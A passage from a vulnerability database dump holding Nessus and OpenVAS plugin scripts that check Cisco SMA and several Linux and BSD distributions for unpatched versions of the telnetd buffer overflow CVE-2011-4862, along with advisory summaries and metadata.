Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79272);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCzv44580\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Content Security Management Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the SMA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Content Security Management Appliance (SMA) is\naffected by a remote code execution vulnerability due to a buffer\noverflow condition in the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCzv44580\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:content_security_management_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_sma_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Content Security Management Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Content Security Management Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Content Security Management Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Content Security Management Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed for Cisco AsyncOS Software for Cisco SMA :\n# 7.2 and prior - 7.2.2-106\n# 7.7 - 7.7.0-206\n# 7.8 - Not Available - Upgrade to 7.9 or later (thus, 7.9.1-102)\n# 7.9 - 7.9.1-102\n# 8.0 - Not Affected\n# 8.1 - Not Affected\n# 8.2 - Not Affected\n# 8.3 - Not Affected\nif (ver =~ \"^[0-6]\\.\" || ver =~ \"^7\\.[012]\\.\")\n display_fix = '7.2.2-106';\nelse if (ver =~ \"^7\\.7\\.\")\n display_fix = '7.7.0-206';\nelse if (ver =~ \"^7\\.[89]\\.\")\n display_fix = '7.9.1-102';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco SMA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco SMA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:24:26", "description": " - Fixed a remote code execution in ktelnetd (CVE-2011-4862\n / bnc#738632)", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : krb5-appl (openSUSE-2012-17)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:krb5-appl-clients", "p-cpe:/a:novell:opensuse:krb5-appl-debugsource", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:krb5-appl-servers", "p-cpe:/a:novell:opensuse:krb5-appl-servers-debuginfo", "p-cpe:/a:novell:opensuse:krb5-appl-clients-debuginfo"], "id": "OPENSUSE-2012-17.NASL", "href": "https://www.tenable.com/plugins/nessus/74578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-17.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74578);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4862\");\n\n script_name(english:\"openSUSE Security Update : krb5-appl (openSUSE-2012-17)\");\n script_summary(english:\"Check for the openSUSE-2012-17 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fixed a remote code execution in ktelnetd (CVE-2011-4862\n / bnc#738632)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=738632\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-appl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-clients-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-servers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-clients-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-clients-debuginfo-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-debugsource-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-servers-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-servers-debuginfo-1.0.2-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-appl-clients / krb5-appl-clients-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-21T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70585", "href": "http://plugins.openvas.org/nasl.php?oid=70585", "type": "openvas", "title": "FreeBSD Ports: krb5-appl", "sourceData": "#\n#VID 4ddc78dc-300a-11e1-a2aa-0016ce01e285\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 4ddc78dc-300a-11e1-a2aa-0016ce01e285\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: krb5-appl\n\nCVE-2011-4862\nBuffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3\nthrough 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2\nand earlier, and Heimdal 1.5.1 and earlier allows remote attackers to\nexecute arbitrary code via a long encryption key, as exploited in the\nwild in December 2011.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\nhttp://www.vuxml.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70585);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 5999 $\");\n script_name(\"FreeBSD Ports: krb5-appl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"krb5-appl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.2_1\")<0) {\n txt += 'Package krb5-appl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201202-05.", "modified": "2017-07-07T00:00:00", "published": "2012-03-12T00:00:00", "id": "OPENVAS:71180", "href": "http://plugins.openvas.org/nasl.php?oid=71180", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201202-05 (heimdal)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A boundary error in Heimdal could result in execution of arbitrary\n code.\";\ntag_solution = \"All Heimdal users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/heimdal-1.5.1-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201202-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=396105\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201202-05.\";\n\n \n \nif(description)\n{\n script_id(71180);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-12 11:35:34 -0400 (Mon, 12 Mar 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201202-05 (heimdal)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-crypt/heimdal\", unaffected: make_list(\"ge 1.5.1-r1\"), vulnerable: make_list(\"lt 1.5.1-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:1361412562310863823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863823", "type": "openvas", "title": "Fedora Update for krb5-appl FEDORA-2011-17493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5-appl FEDORA-2011-17493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863823\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:54 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-17493\");\n script_name(\"Fedora Update for krb5-appl FEDORA-2011-17493\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"krb5-appl on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.2~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update to inetutils\nannounced via advisory DSA 2373-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70691", "href": "http://plugins.openvas.org/nasl.php?oid=70691", "type": "openvas", "title": "Debian Security Advisory DSA 2373-1 (inetutils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2373_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2373-1 (inetutils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2:1.5.dfsg.1-9+lenny1.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:1.6-3.1+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your inetutils packages.\";\ntag_summary = \"The remote host is missing an update to inetutils\nannounced via advisory DSA 2373-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202373-1\";\n\nif(description)\n{\n script_id(70691);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:21:01 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2373-1 (inetutils)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"inetutils-ftp\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ftpd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-inetd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ping\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-syslogd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talk\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talkd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnet\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnetd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-tools\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ftp\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ftpd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-inetd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ping\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-syslogd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talk\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talkd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnet\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnetd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-tools\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "Check for the Version of krb5-appl", "modified": "2017-07-06T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:831517", "href": "http://plugins.openvas.org/nasl.php?oid=831517", "type": "openvas", "title": "Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in krb5-appl,\n heimdal and netkit-telnet:\n\n An unauthenticated remote attacker can cause a buffer overflow and\n probably execute arbitrary code with the privileges of the telnet\n daemon (CVE-2011-4862).\n\n In 